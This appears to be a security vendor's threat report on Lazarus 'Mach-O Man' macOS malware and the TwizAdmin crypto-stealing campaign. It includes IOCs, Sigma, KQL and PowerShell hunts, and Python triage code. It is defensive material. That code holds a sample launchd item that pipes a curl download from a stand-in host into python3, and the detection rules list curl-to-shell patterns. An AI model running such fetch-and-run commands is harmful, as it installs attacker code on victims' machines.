
Mach-O Man & TwizAdmin: Lazarus macOS Operations and Multi-Stage Crypto-Theft

Security Arsenal Team
May 25, 2026

Recent OTX pulses indicate a surge in multi-platform threats targeting financial assets and credential infrastructure. The Lazarus Group is actively pushing "Mach-O Man" malware via "ClickFix" social engineering on macOS, impersonating collaboration tools to steal credentials and session tokens. In parallel, the "DataBreachPlus" group is running a "TwizAdmin" campaign, a multi-stage Malware-as-a-Service (MaaS) offering focused on cryptocurrency clipboard hijacking and seed phrase theft across Windows and macOS. Separately, a large-scale infrastructure mapping identified over 1,350 active C2 servers concentrated in the Middle East (hosted largely by Saudi Telecom) that support operations by APTs including APT28 and Eagle Werewolf using families such as LockBit, Phorpiex and Cobalt Strike.

Threat Actor / Malware Profile

Lazarus Group (Mach-O Man)

  • Distribution: Telegram-based fake meeting invitations (Zoom/Teams) leading to fraudulent collaboration sites.
  • Payload Behavior: Uses "ClickFix" lures to talk users into pasting and running terminal commands that fetch and execute the payload. Deploys "PyLangGhostRAT", a Python-based RAT focused on browser data exfiltration and Telegram-based communication.
  • Persistence: Uses LaunchAgents/LaunchDaemons (the standard macOS persistence mechanism) disguised as legitimate system update processes.
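The LaunchAgent/LaunchDaemon persistence described above can be triaged from the plists on disk. The following is an added Python example, not code from the original report or from any vendor named in it: it parses launchd plists and flags Apple-looking labels backed by non-Apple programs, programs living in user-writable locations, and download-and-pipe command lines. The path heuristics and the sample plists are constructed assumptions for illustration.

```python
import plistlib

# Paths Apple's own launchd items live under, and user-writable locations a
# disguised agent is likely to run from (assumed heuristics, not a complete list).
APPLE_PATHS = ("/System/", "/usr/libexec/", "/usr/sbin/", "/usr/bin/")
USER_WRITABLE = ("/tmp/", "/private/tmp/", "/Users/", "/var/folders/", "/Library/Caches/")
PIPE_MARKERS = ("curl ", "wget ", "| bash", "| sh", "| python", "base64 -d")

def triage_launch_item(plist_bytes):
    """Return the reasons a LaunchAgent/LaunchDaemon plist looks like disguised persistence."""
    item = plistlib.loads(plist_bytes)
    label = str(item.get("Label", ""))
    args = item.get("ProgramArguments") or [item.get("Program", "")]
    program = str(args[0])
    cmdline = " ".join(str(a) for a in args)
    reasons = []
    if label.startswith("com.apple.") and not program.startswith(APPLE_PATHS):
        reasons.append(f"Apple-style label {label!r} but program {program!r} is not an Apple path")
    if any(p in cmdline for p in USER_WRITABLE):
        reasons.append("program or arguments live in a user-writable location")
    if any(m in cmdline for m in PIPE_MARKERS):
        reasons.append("command fetches or decodes content and hands it to an interpreter")
    if reasons and item.get("RunAtLoad"):
        reasons.append("RunAtLoad is set, so it re-executes at every login or boot")
    return reasons

def sample_items():
    """Constructed plists (not real Mach-O Man artifacts), serialised as they would sit on disk."""
    return {
        "disguised_updater": plistlib.dumps({
            "Label": "com.apple.softwareupdate.helper",
            "ProgramArguments": ["/bin/bash", "-c",
                                 "curl -fsSL http://update.example.invalid/u.py | python3"],
            "RunAtLoad": True,
        }),
        "user_dir_agent": plistlib.dumps({
            "Label": "com.system.update",
            "Program": "/Users/alice/Library/Application Support/.update/run.sh",
            "RunAtLoad": True,
        }),
        "benign_vendor": plistlib.dumps({
            "Label": "com.vendor.updater",
            "ProgramArguments": ["/Applications/Vendor.app/Contents/MacOS/updater", "--check"],
            "RunAtLoad": True,
        }),
    }

if __name__ == "__main__":
    for name, data in sample_items().items():
        print(name, triage_launch_item(data) or ["clean"])
```

On a live host the same function can be fed the bytes of each file under ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons.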

DataBreachPlus (TwizAdmin)

  • Distribution: Phishing campaigns impersonating FedEx and logistics entities.
  • Payload Behavior: Multi-stage operation. The first stage is a clipboard hijacker ("clipper") targeting 8 cryptocurrency chains. The second stage steals BIP-39 seed phrases and browser credentials. The third stage deploys "crpx0" ransomware.
  • C2 Communication: Managed via a FastAPI-based panel hosted on 103.241.66[.]238:1337, featuring a license key system.
  • Anti-Analysis: Likely uses packing/obfuscation typical of Python-based malware builders.

IOC Analysis

The provided IOCs reveal a blend of infrastructure and payload indicators.

  • Domains: fanonlyatn.xyz (TwizAdmin C2/filehost) and livemicrosft.com (Lazarus typosquatting domain) should be blocked immediately on DNS proxies and Secure Web Gateways.
  • File Hashes: Multiple SHA256 hashes correspond to the Mach-O binaries and TwizAdmin droppers; SOC teams should push them to EDR as quarantine indicators.
  • Network Indicators: A specific set of Middle Eastern IPs (e.g., 37.32.15.8, 197.51.170.131) is linked to C2 infrastructure for various RATs and botnets. Geolocation blocking and ZTNA policies should be reviewed for these regions.
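Indicators quoted in reports are usually defanged (103.241.66[.]238) and mixed in form (domains, IPs, host:port, URLs), so they need normalising before they can be matched against logs or pushed to a blocklist. As an added Python example that is not part of the original post, the code below refangs and classifies the indicators from this report and runs them over constructed connection log lines; the key=value log format, the hxxp URL entry and the sample lines are assumptions for illustration.

```python
import ipaddress
import re

# Indicators as written in the report, including defanged forms. The hxxp URL entry
# is a constructed illustration, not an indicator from the report.
REPORT_IOCS = [
    "fanonlyatn.xyz", "livemicrosft.com", "103.241.66[.]238:1337",
    "37.32.15.8", "197.51.170.131", "hxxp://livemicrosft[.]com/meeting",
]
# Constructed connection log lines (assumed key=value format, not from a real incident).
SAMPLE_LOGS = [
    "2026-05-25T10:01:02Z host=mac-17 proc=python3 dst=103.241.66.238 dport=1337 sni=-",
    "2026-05-25T10:02:10Z host=win-04 proc=chrome.exe dst=192.0.2.46 dport=443 sni=www.google.com",
    "2026-05-25T10:03:33Z host=mac-17 proc=curl dst=203.0.113.9 dport=80 sni=LiveMicrosft.com",
    "2026-05-25T10:04:01Z host=win-09 proc=svc.exe dst=198.51.100.7 dport=1337 sni=-",
]

def refang(value):
    """Undo common defanging so the value can be matched against logs or pushed to a blocklist."""
    for bad, good in (("[.]", "."), ("(.)", "."), ("[:]", ":"), ("hxxp", "http")):
        value = value.replace(bad, good)
    return value.strip()

def classify(ioc):
    """Return (kind, host, port): kind is 'ip' or 'domain', port is an int or None."""
    host = re.sub(r"^https?://", "", refang(ioc)).split("/")[0]
    port = None
    if re.fullmatch(r"[^:]+:\d+", host):
        host, _, port_str = host.rpartition(":")
        port = int(port_str)
    try:
        ipaddress.ip_address(host)
        return "ip", host, port
    except ValueError:
        return "domain", host.lower(), port

def match_logs(lines, iocs=REPORT_IOCS):
    """Return (line, indicator) pairs for connections to a listed IP or domain.
    A bare destination port (1337 in the last sample line) is not a match on its own."""
    indexed = {classify(i) for i in iocs}
    ips = {host for kind, host, _ in indexed if kind == "ip"}
    domains = {host for kind, host, _ in indexed if kind == "domain"}
    hits = []
    for line in lines:
        fields = dict(kv.split("=", 1) for kv in line.split()[1:])
        if fields.get("dst") in ips:
            hits.append((line, fields["dst"]))
        elif fields.get("sni", "-").lower() in domains:
            hits.append((line, fields["sni"].lower()))
    return hits
```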

Detection Engineering

```yaml
title: Potential macOS ClickFix Execution - Mach-O Man
id: 8a7b6c5d-4e3f-2a1b-9c8d-7e6f5a4b3c2d
description: |
    Detects a shell launched with a command line that downloads content with curl/wget and pipes it
    into bash, sh or python, the pattern the Mach-O Man ClickFix lure asks victims to run, or any
    process referencing the campaign's typosquatted domain. The pipe only appears in the command
    line of the shell that runs the pipeline (e.g. bash -c '...'); a pipeline typed directly into
    Terminal spawns curl and the interpreter as separate processes, neither of which carries the '|'.
status: experimental
author: Security Arsenal
date: 2026/05/26
references:
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.execution
    - attack.t1204.002
logsource:
    product: macos
    category: process_creation
detection:
    selection_shell:
        Image|endswith:
            - '/bash'
            - '/sh'
            - '/zsh'
        CommandLine|contains:
            - 'curl '
            - 'wget '
    selection_pipe:
        CommandLine|contains:
            - '| python3'
            - '| sh'
            - '| bash'
    selection_indicators:
        CommandLine|contains:
            - 'livemicrosft.com'
    condition: (selection_shell and selection_pipe) or selection_indicators
falsepositives:
    - Developer install scripts that pipe curl output into a shell (e.g. package-manager installers)
level: high
---
title: TwizAdmin C2 Infrastructure Connection
id: 1b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
description: |
    Detects network connections to known TwizAdmin C2 infrastructure. The FastAPI panel listens on
    103.241.66.238:1337; the port is documented for context but is not a trigger on its own, since
    alerting at critical level on every connection to port 1337 would page on unrelated services.
status: experimental
author: Security Arsenal
date: 2026/05/26
references:
    - https://intel.breakglass.tech/post/twizadmin-103-241-66
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    product: windows
    category: network_connection
detection:
    selection_domain:
        DestinationHostname|contains:
            - 'fanonlyatn.xyz'
    selection_ip:
        DestinationIp: '103.241.66.238'
    condition: 1 of selection*
falsepositives:
    - Unknown
level: critical
---
title: Suspicious Middle East C2 Traffic
id: 2c3d4e5f-6a7b-8c9d-0e1f-2a3b4c5d6e7f
description: Detects outbound connections to IP addresses identified as part of the large-scale Middle Eastern C2 infrastructure mapping.
status: experimental
author: Security Arsenal
date: 2026/05/26
references:
    - https://hunt.io/blog/middle-east-malicious-infrastructure-report
tags:
    - attack.command_and_control
    - attack.t1071
logsource:
    product: windows
    category: network_connection
detection:
    selection:
        DestinationIp|cidr:
            - '37.32.15.8/32'
            - '197.51.170.131/32'
            - '5.109.182.231/32'
            - '93.113.62.247/32'
            - '94.252.245.193/32'
    filter_legit:
        DestinationHostname|endswith:
            - '.microsoft.com'
            - '.amazonaws.com'
            - '.google.com'
    condition: selection and not filter_legit
falsepositives:
    - Shared hosting or CDN ranges; confirm the destination hostname before escalating
level: medium
```


```kql
// Hunt for connections to the malicious domains and IPs from this report
let IOCs_Domains = dynamic(["fanonlyatn.xyz", "livemicrosft.com"]);
let IOCs_IPs = dynamic(["37.32.15.8", "197.51.170.131", "103.241.66.238", "5.109.182.231", "93.113.62.247", "94.252.245.193"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (IOCs_Domains) or RemoteIP in (IOCs_IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort, ActionType
| order by Timestamp desc
```


```powershell
# PowerShell Hunt Script for TwizAdmin and Mach-O Man Artifacts
# Check for malicious domains in the hosts file and the DNS client cache
$maliciousDomains = @("fanonlyatn.xyz", "livemicrosft.com")
$hostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
Write-Host "Checking hosts file for malicious entries..." -ForegroundColor Yellow
if (Test-Path $hostsPath) {
    $hostsContent = Get-Content $hostsPath
    foreach ($domain in $maliciousDomains) {
        # Escape the domain so '.' is matched literally rather than as a regex wildcard
        if ($hostsContent -match [regex]::Escape($domain)) {
            Write-Host "ALERT: Found $domain in hosts file!" -ForegroundColor Red
        }
    }
}

Write-Host "Checking DNS client cache for recent resolutions..." -ForegroundColor Yellow
foreach ($domain in $maliciousDomains) {
    $cached = Get-DnsClientCache -ErrorAction SilentlyContinue | Where-Object { $_.Entry -like "*$domain*" }
    if ($cached) {
        Write-Host "ALERT: $domain was resolved recently on this host" -ForegroundColor Red
        $cached | Select-Object Entry, Data, TimeToLive
    }
}

# Check for TwizAdmin crypto clipper processes (common names or paths).
# 'python' and 'cmd' are deliberately broad and will list legitimate processes; triage by Path.
$processNames = @("crpx0", "twizadmin", "python", "cmd")
Write-Host "Checking for suspicious processes..." -ForegroundColor Yellow
Get-Process | Where-Object { $processNames -contains $_.ProcessName -or $_.MainWindowTitle -like "*crypto*" } | Select-Object ProcessName, Id, Path
```


Response Priorities

  • Immediate: Block all listed IOCs (domains and IPs) at the perimeter firewall and proxy servers. Isolate any endpoints communicating with 103.241.66[.]238 or fanonlyatn.xyz.
  • 24h: Conduct credential audits for employees who may have interacted with fake meeting invites (Telegram/email). Force password resets and rotate API keys for fintech/cryptocurrency accounts if TwizAdmin activity is suspected.
  • 1 Week: Implement geo-blocking policies for non-essential business traffic to the Middle Eastern IP ranges identified. Update macOS security baselines to restrict unsigned Mach-O binary execution and educate users on "ClickFix" social engineering.
